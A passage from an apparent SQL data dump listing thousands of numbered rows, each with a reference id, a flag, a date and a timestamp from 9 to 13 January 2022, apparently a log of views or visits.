06:47:48'),(42036,1608,1,'2022-01-09','2022-01-09 06:47:49'),(42037,2297,1,'2022-01-09','2022-01-09 06:48:01'),(42038,3724,1,'2022-01-09','2022-01-09 06:52:18'),(42039,468,1,'2022-01-09','2022-01-09 07:02:26'),(42040,1602,1,'2022-01-09','2022-01-09 07:19:13'),(42041,3710,1,'2022-01-09','2022-01-09 07:28:12'),(42042,3781,1,'2022-01-09','2022-01-09 07:37:59'),(42043,1732,1,'2022-01-09','2022-01-09 07:49:53'),(42044,4514,1,'2022-01-09','2022-01-09 08:04:28'),(42045,3764,1,'2022-01-09','2022-01-09 10:15:42'),(42046,1730,1,'2022-01-09','2022-01-09 11:03:38'),(42047,2159,1,'2022-01-09','2022-01-09 12:43:16'),(42048,2154,1,'2022-01-09','2022-01-09 14:14:33'),(42049,2154,1,'2022-01-09','2022-01-09 14:17:06'),(42050,1600,1,'2022-01-09','2022-01-09 14:49:38'),(42051,72,1,'2022-01-09','2022-01-09 14:58:57'),(42052,3045,1,'2022-01-09','2022-01-09 16:52:48'),(42053,3072,1,'2022-01-09','2022-01-09 17:09:42'),(42054,80,1,'2022-01-09','2022-01-09 17:17:56'),(42055,2309,1,'2022-01-09','2022-01-09 17:23:24'),(42056,1602,1,'2022-01-09','2022-01-09 17:28:58'),(42057,467,1,'2022-01-09','2022-01-09 17:32:10'),(42058,3781,1,'2022-01-09','2022-01-09 17:32:22'),(42059,1602,1,'2022-01-09','2022-01-09 17:38:43'),(42060,467,1,'2022-01-09','2022-01-09 17:55:09'),(42061,3781,1,'2022-01-09','2022-01-09 18:09:28'),(42062,1606,1,'2022-01-09','2022-01-09 18:22:09'),(42063,3117,1,'2022-01-09','2022-01-09 18:51:32'),(42064,1608,1,'2022-01-09','2022-01-09 18:53:01'),(42065,4448,1,'2022-01-09','2022-01-09 18:56:59'),(42066,3280,1,'2022-01-09','2022-01-09 19:40:55'),(42067,2410,1,'2022-01-09','2022-01-09 19:47:14'),(42068,1612,1,'2022-01-09','2022-01-09 19:59:08'),(42069,1870,1,'2022-01-09','2022-01-09 20:02:16'),(42070,2309,1,'2022-01-09','2022-01-09 20:24:46'),(42071,72,1,'2022-01-09','2022-01-09 21:17:54'),(42072,80,1,'2022-01-09','2022-01-09 21:51:56'),(42073,1592,1,'2022-01-09','2022-01-09 22:09:27'),(42074,1877,1,'2022-01-09','2022-01-09 22:16:29'),(42075,1739,1,'2022-01-09','2022-01-09 23:54:20'),(42076,469,1,'2022-01-10','2022-01-10 00:06:23'),(42077,3229,1,'2022-01-10','2022-01-10 00:17:10'),(42078,470,1,'2022-01-10','2022-01-10 02:05:28'),(42079,3781,1,'2022-01-10','2022-01-10 02:27:59'),(42080,3482,1,'2022-01-10','2022-01-10 02:31:48'),(42081,468,1,'2022-01-10','2022-01-10 02:50:34'),(42082,2293,1,'2022-01-10','2022-01-10 03:08:48'),(42083,1730,1,'2022-01-10','2022-01-10 04:01:34'),(42084,1544,1,'2022-01-10','2022-01-10 04:54:11'),(42085,1608,1,'2022-01-10','2022-01-10 04:54:13'),(42086,1544,1,'2022-01-10','2022-01-10 04:58:39'),(42087,3107,1,'2022-01-10','2022-01-10 05:20:54'),(42088,4326,1,'2022-01-10','2022-01-10 05:39:13'),(42089,2309,1,'2022-01-10','2022-01-10 05:39:15'),(42090,72,1,'2022-01-10','2022-01-10 05:51:27'),(42091,1602,1,'2022-01-10','2022-01-10 06:01:45'),(42092,1732,1,'2022-01-10','2022-01-10 06:24:10'),(42093,3072,1,'2022-01-10','2022-01-10 06:28:34'),(42094,2804,1,'2022-01-10','2022-01-10 06:31:14'),(42095,80,1,'2022-01-10','2022-01-10 06:52:52'),(42096,2503,1,'2022-01-10','2022-01-10 06:58:40'),(42097,479,1,'2022-01-10','2022-01-10 07:16:36'),(42098,89,1,'2022-01-10','2022-01-10 08:01:16'),(42099,2748,1,'2022-01-10','2022-01-10 08:02:52'),(42100,1606,1,'2022-01-10','2022-01-10 08:03:57'),(42101,2503,1,'2022-01-10','2022-01-10 08:15:19'),(42102,1598,1,'2022-01-10','2022-01-10 08:18:55'),(42103,1598,1,'2022-01-10','2022-01-10 08:20:02'),(42104,1598,1,'2022-01-10','2022-01-10 08:20:18'),(42105,1720,1,'2022-01-10','2022-01-10 08:52:11'),(42106,3038,1,'2022-01-10','2022-01-10 08:56:39'),(42107,1582,1,'2022-01-10','2022-01-10 09:24:10'),(42108,80,1,'2022-01-10','2022-01-10 09:24:30'),(42109,1588,1,'2022-01-10','2022-01-10 09:24:31'),(42110,80,1,'2022-01-10','2022-01-10 09:30:11'),(42111,2813,1,'2022-01-10','2022-01-10 09:37:45'),(42112,3787,1,'2022-01-10','2022-01-10 09:52:25'),(42113,4542,1,'2022-01-10','2022-01-10 10:00:43'),(42114,80,1,'2022-01-10','2022-01-10 10:00:59'),(42115,1718,1,'2022-01-10','2022-01-10 10:01:57'),(42116,3710,1,'2022-01-10','2022-01-10 10:04:40'),(42117,1602,1,'2022-01-10','2022-01-10 10:04:55'),(42118,1602,1,'2022-01-10','2022-01-10 10:29:26'),(42119,2410,1,'2022-01-10','2022-01-10 10:33:57'),(42120,1602,1,'2022-01-10','2022-01-10 10:59:02'),(42121,1720,1,'2022-01-10','2022-01-10 11:02:12'),(42122,2309,1,'2022-01-10','2022-01-10 11:08:01'),(42123,3498,1,'2022-01-10','2022-01-10 11:45:36'),(42124,3482,1,'2022-01-10','2022-01-10 11:45:37'),(42125,3430,1,'2022-01-10','2022-01-10 11:45:37'),(42126,3438,1,'2022-01-10','2022-01-10 11:45:39'),(42127,2956,1,'2022-01-10','2022-01-10 11:45:41'),(42128,2813,1,'2022-01-10','2022-01-10 11:56:58'),(42129,4412,1,'2022-01-10','2022-01-10 12:08:55'),(42130,1582,1,'2022-01-10','2022-01-10 12:25:54'),(42131,91,1,'2022-01-10','2022-01-10 12:44:45'),(42132,91,1,'2022-01-10','2022-01-10 12:51:27'),(42133,1774,1,'2022-01-10','2022-01-10 12:53:37'),(42134,1588,1,'2022-01-10','2022-01-10 12:55:17'),(42135,4529,1,'2022-01-10','2022-01-10 12:59:03'),(42136,1588,1,'2022-01-10','2022-01-10 13:08:56'),(42137,4520,1,'2022-01-10','2022-01-10 13:24:29'),(42138,3083,1,'2022-01-10','2022-01-10 13:53:29'),(42139,1592,1,'2022-01-10','2022-01-10 13:55:00'),(42140,3083,1,'2022-01-10','2022-01-10 13:55:57'),(42141,1592,1,'2022-01-10','2022-01-10 13:57:17'),(42142,1598,1,'2022-01-10','2022-01-10 14:22:36'),(42143,3079,1,'2022-01-10','2022-01-10 14:50:30'),(42144,3079,1,'2022-01-10','2022-01-10 14:50:44'),(42145,3079,1,'2022-01-10','2022-01-10 14:50:59'),(42146,1544,1,'2022-01-10','2022-01-10 14:51:40'),(42147,1544,1,'2022-01-10','2022-01-10 14:52:50'),(42148,108,1,'2022-01-10','2022-01-10 14:53:39'),(42149,4457,1,'2022-01-10','2022-01-10 14:58:07'),(42150,87,1,'2022-01-10','2022-01-10 14:59:00'),(42151,89,1,'2022-01-10','2022-01-10 14:59:43'),(42152,1776,1,'2022-01-10','2022-01-10 15:10:28'),(42153,1594,1,'2022-01-10','2022-01-10 17:24:51'),(42154,1594,1,'2022-01-10','2022-01-10 17:29:30'),(42155,1582,1,'2022-01-10','2022-01-10 17:32:31'),(42156,89,1,'2022-01-10','2022-01-10 17:33:28'),(42157,89,1,'2022-01-10','2022-01-10 17:33:46'),(42158,1610,1,'2022-01-10','2022-01-10 17:34:07'),(42159,2457,1,'2022-01-10','2022-01-10 17:34:07'),(42160,89,1,'2022-01-10','2022-01-10 17:36:02'),(42161,89,1,'2022-01-10','2022-01-10 17:36:11'),(42162,1602,1,'2022-01-10','2022-01-10 17:36:23'),(42163,89,1,'2022-01-10','2022-01-10 17:36:36'),(42164,89,1,'2022-01-10','2022-01-10 17:36:43'),(42165,469,1,'2022-01-10','2022-01-10 18:35:56'),(42166,3781,1,'2022-01-10','2022-01-10 18:48:36'),(42167,3781,1,'2022-01-10','2022-01-10 18:49:50'),(42168,1594,1,'2022-01-10','2022-01-10 19:06:01'),(42169,1594,1,'2022-01-10','2022-01-10 19:06:54'),(42170,3030,1,'2022-01-10','2022-01-10 19:41:59'),(42171,3030,1,'2022-01-10','2022-01-10 19:49:55'),(42172,3316,1,'2022-01-10','2022-01-10 19:54:37'),(42173,91,1,'2022-01-10','2022-01-10 19:54:40'),(42174,3102,1,'2022-01-10','2022-01-10 19:55:06'),(42175,4457,1,'2022-01-10','2022-01-10 21:05:37'),(42176,570,1,'2022-01-10','2022-01-10 21:52:59'),(42177,2457,1,'2022-01-10','2022-01-10 22:16:00'),(42178,72,1,'2022-01-10','2022-01-10 22:33:29'),(42179,472,1,'2022-01-10','2022-01-10 22:38:10'),(42180,3285,1,'2022-01-10','2022-01-10 22:44:30'),(42181,3285,1,'2022-01-10','2022-01-10 22:45:10'),(42182,1598,1,'2022-01-10','2022-01-10 22:48:27'),(42183,1544,1,'2022-01-10','2022-01-10 23:46:09'),(42184,1544,1,'2022-01-10','2022-01-10 23:49:11'),(42185,2704,1,'2022-01-11','2022-01-11 00:59:23'),(42186,4436,1,'2022-01-11','2022-01-11 03:47:07'),(42187,1608,1,'2022-01-11','2022-01-11 03:50:47'),(42188,2813,1,'2022-01-11','2022-01-11 04:48:39'),(42189,4520,1,'2022-01-11','2022-01-11 05:10:05'),(42190,1747,1,'2022-01-11','2022-01-11 05:11:12'),(42191,1726,1,'2022-01-11','2022-01-11 05:31:22'),(42192,2769,1,'2022-01-11','2022-01-11 06:11:01'),(42193,1582,1,'2022-01-11','2022-01-11 06:21:59'),(42194,68,1,'2022-01-11','2022-01-11 06:22:21'),(42195,76,1,'2022-01-11','2022-01-11 06:22:53'),(42196,89,1,'2022-01-11','2022-01-11 06:23:13'),(42197,89,1,'2022-01-11','2022-01-11 06:24:04'),(42198,470,1,'2022-01-11','2022-01-11 06:40:01'),(42199,2159,1,'2022-01-11','2022-01-11 06:47:20'),(42200,1594,1,'2022-01-11','2022-01-11 07:35:50'),(42201,2309,1,'2022-01-11','2022-01-11 07:40:03'),(42202,3107,1,'2022-01-11','2022-01-11 08:06:49'),(42203,1582,1,'2022-01-11','2022-01-11 08:36:32'),(42204,3004,1,'2022-01-11','2022-01-11 08:37:52'),(42205,1602,1,'2022-01-11','2022-01-11 08:48:07'),(42206,3267,1,'2022-01-11','2022-01-11 09:18:43'),(42207,4238,1,'2022-01-11','2022-01-11 09:19:38'),(42208,1600,1,'2022-01-11','2022-01-11 09:20:38'),(42209,1588,1,'2022-01-11','2022-01-11 09:31:11'),(42210,4338,1,'2022-01-11','2022-01-11 09:52:06'),(42211,2965,1,'2022-01-11','2022-01-11 09:52:14'),(42212,1594,1,'2022-01-11','2022-01-11 09:57:49'),(42213,1592,1,'2022-01-11','2022-01-11 10:01:07'),(42214,469,1,'2022-01-11','2022-01-11 10:12:41'),(42215,472,1,'2022-01-11','2022-01-11 10:29:46'),(42216,3090,1,'2022-01-11','2022-01-11 10:29:53'),(42217,1614,1,'2022-01-11','2022-01-11 10:33:40'),(42218,1594,1,'2022-01-11','2022-01-11 10:36:43'),(42219,1582,1,'2022-01-11','2022-01-11 10:37:57'),(42220,1594,1,'2022-01-11','2022-01-11 10:38:40'),(42221,1612,1,'2022-01-11','2022-01-11 10:43:34'),(42222,108,1,'2022-01-11','2022-01-11 10:48:19'),(42223,1870,1,'2022-01-11','2022-01-11 10:49:08'),(42224,1718,1,'2022-01-11','2022-01-11 10:49:16'),(42225,2457,1,'2022-01-11','2022-01-11 10:50:32'),(42226,3746,1,'2022-01-11','2022-01-11 10:55:09'),(42227,3045,1,'2022-01-11','2022-01-11 10:57:03'),(42228,1598,1,'2022-01-11','2022-01-11 11:03:13'),(42229,1594,1,'2022-01-11','2022-01-11 11:05:36'),(42230,1594,1,'2022-01-11','2022-01-11 11:05:42'),(42231,1602,1,'2022-01-11','2022-01-11 11:06:07'),(42232,3752,1,'2022-01-11','2022-01-11 11:08:20'),(42233,2769,1,'2022-01-11','2022-01-11 11:12:02'),(42234,470,1,'2022-01-11','2022-01-11 11:36:59'),(42235,68,1,'2022-01-11','2022-01-11 11:45:29'),(42236,4436,1,'2022-01-11','2022-01-11 11:53:58'),(42237,1747,1,'2022-01-11','2022-01-11 12:13:50'),(42238,1594,1,'2022-01-11','2022-01-11 12:15:47'),(42239,1718,1,'2022-01-11','2022-01-11 12:33:42'),(42240,3482,1,'2022-01-11','2022-01-11 12:35:40'),(42241,80,1,'2022-01-11','2022-01-11 12:53:50'),(42242,1877,1,'2022-01-11','2022-01-11 13:13:31'),(42243,1770,1,'2022-01-11','2022-01-11 13:57:30'),(42244,1770,1,'2022-01-11','2022-01-11 13:57:52'),(42245,1588,1,'2022-01-11','2022-01-11 14:04:31'),(42246,1602,1,'2022-01-11','2022-01-11 14:48:59'),(42247,1722,1,'2022-01-11','2022-01-11 15:23:06'),(42248,4436,1,'2022-01-11','2022-01-11 15:27:34'),(42249,1600,1,'2022-01-11','2022-01-11 15:35:10'),(42250,1608,1,'2022-01-11','2022-01-11 15:45:45'),(42251,84,1,'2022-01-11','2022-01-11 15:59:11'),(42252,2309,1,'2022-01-11','2022-01-11 16:07:04'),(42253,1602,1,'2022-01-11','2022-01-11 16:29:50'),(42254,1600,1,'2022-01-11','2022-01-11 16:57:51'),(42255,477,1,'2022-01-11','2022-01-11 16:59:36'),(42256,1743,1,'2022-01-11','2022-01-11 17:18:46'),(42257,1594,1,'2022-01-11','2022-01-11 17:41:39'),(42258,3282,1,'2022-01-11','2022-01-11 18:00:13'),(42259,3781,1,'2022-01-11','2022-01-11 18:14:23'),(42260,3764,1,'2022-01-11','2022-01-11 18:29:29'),(42261,3102,1,'2022-01-11','2022-01-11 18:35:20'),(42262,3030,1,'2022-01-11','2022-01-11 18:45:55'),(42263,470,1,'2022-01-11','2022-01-11 19:00:00'),(42264,4542,1,'2022-01-11','2022-01-11 19:04:17'),(42265,1739,1,'2022-01-11','2022-01-11 19:25:38'),(42266,1608,1,'2022-01-11','2022-01-11 19:29:23'),(42267,1582,1,'2022-01-11','2022-01-11 19:29:41'),(42268,1608,1,'2022-01-11','2022-01-11 19:30:49'),(42269,469,1,'2022-01-11','2022-01-11 19:44:35'),(42270,1612,1,'2022-01-11','2022-01-11 19:53:46'),(42271,1780,1,'2022-01-11','2022-01-11 20:01:58'),(42272,102,1,'2022-01-11','2022-01-11 20:02:25'),(42273,3124,1,'2022-01-11','2022-01-11 20:14:59'),(42274,1718,1,'2022-01-11','2022-01-11 20:29:43'),(42275,1586,1,'2022-01-11','2022-01-11 20:38:26'),(42276,1588,1,'2022-01-11','2022-01-11 20:44:39'),(42277,3072,1,'2022-01-11','2022-01-11 20:52:59'),(42278,3771,1,'2022-01-11','2022-01-11 20:53:05'),(42279,4341,1,'2022-01-11','2022-01-11 20:53:11'),(42280,3316,1,'2022-01-11','2022-01-11 20:53:16'),(42281,3777,1,'2022-01-11','2022-01-11 20:53:21'),(42282,3023,1,'2022-01-11','2022-01-11 20:53:27'),(42283,3752,1,'2022-01-11','2022-01-11 20:53:33'),(42284,3749,1,'2022-01-11','2022-01-11 20:53:38'),(42285,2956,1,'2022-01-11','2022-01-11 20:53:44'),(42286,3746,1,'2022-01-11','2022-01-11 20:53:50'),(42287,3531,1,'2022-01-11','2022-01-11 20:53:54'),(42288,3489,1,'2022-01-11','2022-01-11 20:53:59'),(42289,4520,1,'2022-01-11','2022-01-11 20:54:03'),(42290,3710,1,'2022-01-11','2022-01-11 20:54:09'),(42291,4335,1,'2022-01-11','2022-01-11 20:54:14'),(42292,3038,1,'2022-01-11','2022-01-11 20:54:20'),(42293,3430,1,'2022-01-11','2022-01-11 20:54:25'),(42294,3307,1,'2022-01-11','2022-01-11 20:54:30'),(42295,3482,1,'2022-01-11','2022-01-11 20:54:36'),(42296,2809,1,'2022-01-11','2022-01-11 20:54:41'),(42297,3479,1,'2022-01-11','2022-01-11 20:54:46'),(42298,3030,1,'2022-01-11','2022-01-11 20:54:52'),(42299,3069,1,'2022-01-11','2022-01-11 20:54:56'),(42300,4400,1,'2022-01-11','2022-01-11 20:55:01'),(42301,3738,1,'2022-01-11','2022-01-11 20:55:07'),(42302,3721,1,'2022-01-11','2022-01-11 20:55:12'),(42303,3090,1,'2022-01-11','2022-01-11 20:55:17'),(42304,3534,1,'2022-01-11','2022-01-11 20:55:22'),(42305,3714,1,'2022-01-11','2022-01-11 20:55:27'),(42306,4338,1,'2022-01-11','2022-01-11 20:55:31'),(42307,3774,1,'2022-01-11','2022-01-11 20:55:36'),(42308,3045,1,'2022-01-11','2022-01-11 20:55:40'),(42309,2804,1,'2022-01-11','2022-01-11 20:55:45'),(42310,3034,1,'2022-01-11','2022-01-11 20:55:50'),(42311,3313,1,'2022-01-11','2022-01-11 20:55:55'),(42312,3027,1,'2022-01-11','2022-01-11 20:56:00'),(42313,3735,1,'2022-01-11','2022-01-11 20:56:07'),(42314,4454,1,'2022-01-11','2022-01-11 20:56:15'),(42315,4332,1,'2022-01-11','2022-01-11 20:56:22'),(42316,3727,1,'2022-01-11','2022-01-11 20:56:31'),(42317,4329,1,'2022-01-11','2022-01-11 20:56:37'),(42318,3731,1,'2022-01-11','2022-01-11 20:56:44'),(42319,3060,1,'2022-01-11','2022-01-11 20:56:53'),(42320,4323,1,'2022-01-11','2022-01-11 20:57:03'),(42321,3764,1,'2022-01-11','2022-01-11 20:57:11'),(42322,3297,1,'2022-01-11','2022-01-11 20:57:20'),(42323,2801,1,'2022-01-11','2022-01-11 20:57:26'),(42324,4524,1,'2022-01-11','2022-01-11 20:57:34'),(42325,3117,1,'2022-01-11','2022-01-11 20:57:40'),(42326,3127,1,'2022-01-11','2022-01-11 20:57:46'),(42327,4517,1,'2022-01-11','2022-01-11 20:57:50'),(42328,3724,1,'2022-01-11','2022-01-11 20:57:56'),(42329,4529,1,'2022-01-11','2022-01-11 20:58:01'),(42330,3498,1,'2022-01-11','2022-01-11 20:58:06'),(42331,3063,1,'2022-01-11','2022-01-11 20:58:11'),(42332,4275,1,'2022-01-11','2022-01-11 20:58:16'),(42333,3124,1,'2022-01-11','2022-01-11 20:58:21'),(42334,4514,1,'2022-01-11','2022-01-11 20:58:27'),(42335,4326,1,'2022-01-11','2022-01-11 20:58:33'),(42336,2813,1,'2022-01-11','2022-01-11 20:58:39'),(42337,3781,1,'2022-01-11','2022-01-11 20:58:46'),(42338,3066,1,'2022-01-11','2022-01-11 20:58:53'),(42339,2911,1,'2022-01-11','2022-01-11 20:59:00'),(42340,4517,1,'2022-01-11','2022-01-11 20:59:06'),(42341,3486,1,'2022-01-11','2022-01-11 20:59:15'),(42342,3438,1,'2022-01-11','2022-01-11 20:59:33'),(42343,3742,1,'2022-01-11','2022-01-11 20:59:50'),(42344,3290,1,'2022-01-11','2022-01-11 21:00:06'),(42345,1582,1,'2022-01-11','2022-01-11 21:01:43'),(42346,3771,1,'2022-01-11','2022-01-11 21:03:33'),(42347,2297,1,'2022-01-11','2022-01-11 21:05:29'),(42348,1606,1,'2022-01-11','2022-01-11 21:05:41'),(42349,3482,1,'2022-01-11','2022-01-11 21:24:53'),(42350,4238,1,'2022-01-11','2022-01-11 21:27:57'),(42351,108,1,'2022-01-11','2022-01-11 21:28:10'),(42352,4338,1,'2022-01-11','2022-01-11 21:32:13'),(42353,4448,1,'2022-01-11','2022-01-11 21:50:29'),(42354,2293,1,'2022-01-11','2022-01-11 22:21:40'),(42355,3316,1,'2022-01-11','2022-01-11 22:29:23'),(42356,2154,1,'2022-01-11','2022-01-11 22:40:16'),(42357,3072,1,'2022-01-11','2022-01-11 22:57:44'),(42358,1709,1,'2022-01-11','2022-01-11 22:57:45'),(42359,4326,1,'2022-01-11','2022-01-11 22:58:16'),(42360,3764,1,'2022-01-11','2022-01-11 22:59:27'),(42361,1602,1,'2022-01-11','2022-01-11 23:41:59'),(42362,1602,1,'2022-01-11','2022-01-11 23:44:22'),(42363,1602,1,'2022-01-11','2022-01-11 23:48:15'),(42364,1582,1,'2022-01-11','2022-01-11 23:56:21'),(42365,1600,1,'2022-01-12','2022-01-12 02:00:10'),(42366,4529,1,'2022-01-12','2022-01-12 04:09:46'),(42367,1608,1,'2022-01-12','2022-01-12 04:21:58'),(42368,1776,1,'2022-01-12','2022-01-12 04:22:07'),(42369,1718,1,'2022-01-12','2022-01-12 04:30:07'),(42370,2775,1,'2022-01-12','2022-01-12 04:36:27'),(42371,2991,1,'2022-01-12','2022-01-12 04:57:59'),(42372,469,1,'2022-01-12','2022-01-12 05:05:16'),(42373,1602,1,'2022-01-12','2022-01-12 05:13:58'),(42374,1588,1,'2022-01-12','2022-01-12 05:26:47'),(42375,1582,1,'2022-01-12','2022-01-12 05:34:02'),(42376,472,1,'2022-01-12','2022-01-12 05:41:41'),(42377,1612,1,'2022-01-12','2022-01-12 05:48:23'),(42378,87,1,'2022-01-12','2022-01-12 05:52:07'),(42379,2457,1,'2022-01-12','2022-01-12 06:00:51'),(42380,2297,1,'2022-01-12','2022-01-12 06:07:57'),(42381,108,1,'2022-01-12','2022-01-12 06:08:08'),(42382,1586,1,'2022-01-12','2022-01-12 06:33:22'),(42383,76,1,'2022-01-12','2022-01-12 06:49:12'),(42384,2297,1,'2022-01-12','2022-01-12 06:52:55'),(42385,3090,1,'2022-01-12','2022-01-12 06:53:06'),(42386,2748,1,'2022-01-12','2022-01-12 06:55:56'),(42387,1606,1,'2022-01-12','2022-01-12 07:02:45'),(42388,1582,1,'2022-01-12','2022-01-12 07:06:59'),(42389,2813,1,'2022-01-12','2022-01-12 07:28:49'),(42390,4412,1,'2022-01-12','2022-01-12 07:30:25'),(42391,1709,1,'2022-01-12','2022-01-12 07:38:38'),(42392,470,1,'2022-01-12','2022-01-12 07:49:41'),(42393,4238,1,'2022-01-12','2022-01-12 08:07:47'),(42394,72,1,'2022-01-12','2022-01-12 08:15:08'),(42395,4238,1,'2022-01-12','2022-01-12 08:52:45'),(42396,4326,1,'2022-01-12','2022-01-12 09:21:42'),(42397,1870,1,'2022-01-12','2022-01-12 09:37:44'),(42398,1606,1,'2022-01-12','2022-01-12 09:52:55'),(42399,2309,1,'2022-01-12','2022-01-12 10:04:07'),(42400,1594,1,'2022-01-12','2022-01-12 11:37:25'),(42401,68,1,'2022-01-12','2022-01-12 11:37:43'),(42402,1594,1,'2022-01-12','2022-01-12 11:38:55'),(42403,91,1,'2022-01-12','2022-01-12 12:45:58'),(42404,4457,1,'2022-01-12','2022-01-12 12:49:24'),(42405,68,1,'2022-01-12','2022-01-12 12:52:07'),(42406,1602,1,'2022-01-12','2022-01-12 13:41:48'),(42407,1582,1,'2022-01-12','2022-01-12 14:14:56'),(42408,2769,1,'2022-01-12','2022-01-12 14:26:17'),(42409,1718,1,'2022-01-12','2022-01-12 15:11:14'),(42410,72,1,'2022-01-12','2022-01-12 16:05:55'),(42411,1594,1,'2022-01-12','2022-01-12 16:42:49'),(42412,1600,1,'2022-01-12','2022-01-12 18:07:57'),(42413,1606,1,'2022-01-12','2022-01-12 18:08:01'),(42414,1608,1,'2022-01-12','2022-01-12 18:08:35'),(42415,2297,1,'2022-01-12','2022-01-12 18:10:21'),(42416,1608,1,'2022-01-12','2022-01-12 18:15:58'),(42417,2813,1,'2022-01-12','2022-01-12 18:20:35'),(42418,1614,1,'2022-01-12','2022-01-12 18:34:40'),(42419,80,1,'2022-01-12','2022-01-12 18:44:05'),(42420,3781,1,'2022-01-12','2022-01-12 18:44:50'),(42421,2178,1,'2022-01-12','2022-01-12 19:00:28'),(42422,469,1,'2022-01-12','2022-01-12 19:10:21'),(42423,1582,1,'2022-01-12','2022-01-12 19:19:52'),(42424,4326,1,'2022-01-12','2022-01-12 19:37:45'),(42425,1602,1,'2022-01-12','2022-01-12 19:51:31'),(42426,68,1,'2022-01-12','2022-01-12 19:52:51'),(42427,1602,1,'2022-01-12','2022-01-12 19:54:13'),(42428,1728,1,'2022-01-12','2022-01-12 19:59:13'),(42429,3764,1,'2022-01-12','2022-01-12 20:09:25'),(42430,470,1,'2022-01-12','2022-01-12 20:21:38'),(42431,470,1,'2022-01-12','2022-01-12 20:23:15'),(42432,1582,1,'2022-01-12','2022-01-12 20:24:44'),(42433,68,1,'2022-01-12','2022-01-12 20:25:30'),(42434,68,1,'2022-01-12','2022-01-12 20:26:23'),(42435,470,1,'2022-01-12','2022-01-12 20:27:14'),(42436,1582,1,'2022-01-12','2022-01-12 20:27:34'),(42437,2178,1,'2022-01-12','2022-01-12 20:37:01'),(42438,1582,1,'2022-01-12','2022-01-12 20:51:19'),(42439,1877,1,'2022-01-12','2022-01-12 20:51:20'),(42440,80,1,'2022-01-12','2022-01-12 21:06:34'),(42441,1612,1,'2022-01-12','2022-01-12 21:21:21'),(42442,468,1,'2022-01-12','2022-01-12 21:37:24'),(42443,2410,1,'2022-01-12','2022-01-12 22:08:11'),(42444,1602,1,'2022-01-12','2022-01-12 22:09:59'),(42445,2804,1,'2022-01-12','2022-01-12 22:17:48'),(42446,3482,1,'2022-01-12','2022-01-12 22:23:55'),(42447,487,1,'2022-01-12','2022-01-12 22:51:51'),(42448,1594,1,'2022-01-12','2022-01-12 23:00:32'),(42449,2989,1,'2022-01-12','2022-01-12 23:27:44'),(42450,2748,1,'2022-01-12','2022-01-12 23:55:20'),(42451,1606,1,'2022-01-12','2022-01-12 23:59:47'),(42452,4520,1,'2022-01-13','2022-01-13 00:00:35'),(42453,1718,1,'2022-01-13','2022-01-13 00:12:24'),(42454,3781,1,'2022-01-13','2022-01-13 00:22:00'),(42455,72,1,'2022-01-13','2022-01-13 00:58:32'),(42456,2309,1,'2022-01-13','2022-01-13 01:12:49'),(42457,1614,1,'2022-01-13','2022-01-13 01:15:22'),(42458,3090,1,'2022-01-13','2022-01-13 01:42:43'),(42459,3710,1,'2022-01-13','2022-01-13 02:06:01'),(42460,1608,1,'2022-01-13','2022-01-13 04:28:14'),(42461,2297,1,'2022-01-13','2022-01-13 04:30:40'),(42462,89,1,'2022-01-13','2022-01-13 04:32:43'),(42463,2297,1,'2022-01-13','2022-01-13 04:33:05'),(42464,1606,1,'2022-01-13','2022-01-13 04:41:38'),(42465,469,1,'2022-01-13','2022-01-13 04:48:41'),(42466,1586,1,'2022-01-13','2022-01-13 04:52:46'),(42467,1614,1,'2022-01-13','2022-01-13 04:59:31'),(42468,3482,1,'2022-01-13','2022-01-13 05:13:59'),(42469,1594,1,'2022-01-13','2022-01-13 05:17:44'),(42470,1586,1,'2022-01-13','2022-01-13 05:26:01'),(42471,1588,1,'2022-01-13','2022-01-13 05:34:23'),(42472,4524,1,'2022-01-13','2022-01-13 05:41:56'),(42473,1588,1,'2022-01-13','2022-01-13 05:49:59'),(42474,3072,1,'2022-01-13','2022-01-13 05:58:12'),(42475,2813,1,'2022-01-13','2022-01-13 05:58:31'),(42476,1598,1,'2022-01-13','2022-01-13 06:07:09'),(42477,1582,1,'2022-01-13','2022-01-13 06:17:55'),(42478,2457,1,'2022-01-13','2022-01-13 06:26:24'),(42479,2457,1,'2022-01-13','2022-01-13 06:27:58'),(42480,80,1,'2022-01-13','2022-01-13 06:39:47'),(42481,1592,1,'2022-01-13','2022-01-13 06:48:09'),(42482,1586,1,'2022-01-13','2022-01-13 06:55:59'),(42483,1602,1,'2022-01-13','2022-01-13 07:00:59'),(42484,1602,1,'2022-01-13','2022-01-13 07:02:43'),(42485,3781,1,'2022-01-13','2022-01-13 07:21:54'),(42486,68,1,'2022-01-13','2022-01-13 07:29:33'),(42487,3482,1,'2022-01-13','2022-01-13 07:32:44'),(42488,470,1,'2022-01-13','2022-01-13 07:42:43'),(42489,3764,1,'2022-01-13','2022-01-13 07:44:52'),(42490,1877,1,'2022-01-13','2022-01-13 07:55:59'),(42491,1877,1,'2022-01-13','2022-01-13 07:57:41'),(42492,1718,1,'2022-01-13','2022-01-13 08:02:01'),(42493,2748,1,'2022-01-13','2022-01-13 08:13:49'),(42494,3531,1,'2022-01-13','2022-01-13 08:14:20'),(42495,2804,1,'2022-01-13','2022-01-13 08:23:53'),(42496,2410,1,'2022-01-13','2022-01-13 08:42:52'),(42497,2769,1,'2022-01-13','2022-01-13 09:07:43'),(42498,1600,1,'2022-01-13','2022-01-13 09:17:05'),(42499,1600,1,'2022-01-13','2022-01-13 09:20:50'),(42500,72,1,'2022-01-13','2022-01-13 09:28:54'),(42501,1596,1,'2022-01-13','2022-01-13 09:29:48'),(42502,80,1,'2022-01-13','2022-01-13 09:30:24'),(42503,1596,1,'2022-01-13','2022-01-13 09:31:48'),(42504,80,1,'2022-01-13','2022-01-13 09:32:09'),(42505,1614,1,'2022-01-13','2022-01-13 09:52:06'),(42506,1594,1,'2022-01-13','2022-01-13 10:04:36'),(42507,2991,1,'2022-01-13','2022-01-13 10:18:21'),(42508,89,1,'2022-01-13','2022-01-13 10:26:14'),(42509,1872,1,'2022-01-13','2022-01-13 10:32:29'),(42510,72,1,'2022-01-13','2022-01-13 10:32:50'),(42511,2159,1,'2022-01-13','2022-01-13 10:33:15'),(42512,108,1,'2022-01-13','2022-01-13 10:36:32'),(42513,1724,1,'2022-01-13','2022-01-13 10:40:13'),(42514,3781,1,'2022-01-13','2022-01-13 10:46:03'),(42515,1614,1,'2022-01-13','2022-01-13 11:00:12'),(42516,80,1,'2022-01-13','2022-01-13 11:08:25'),(42517,1598,1,'2022-01-13','2022-01-13 11:24:23'),(42518,470,1,'2022-01-13','2022-01-13 11:35:41'),(42519,2609,1,'2022-01-13','2022-01-13 11:50:11'),(42520,2609,1,'2022-01-13','2022-01-13 11:50:19'),(42521,2609,1,'2022-01-13','2022-01-13 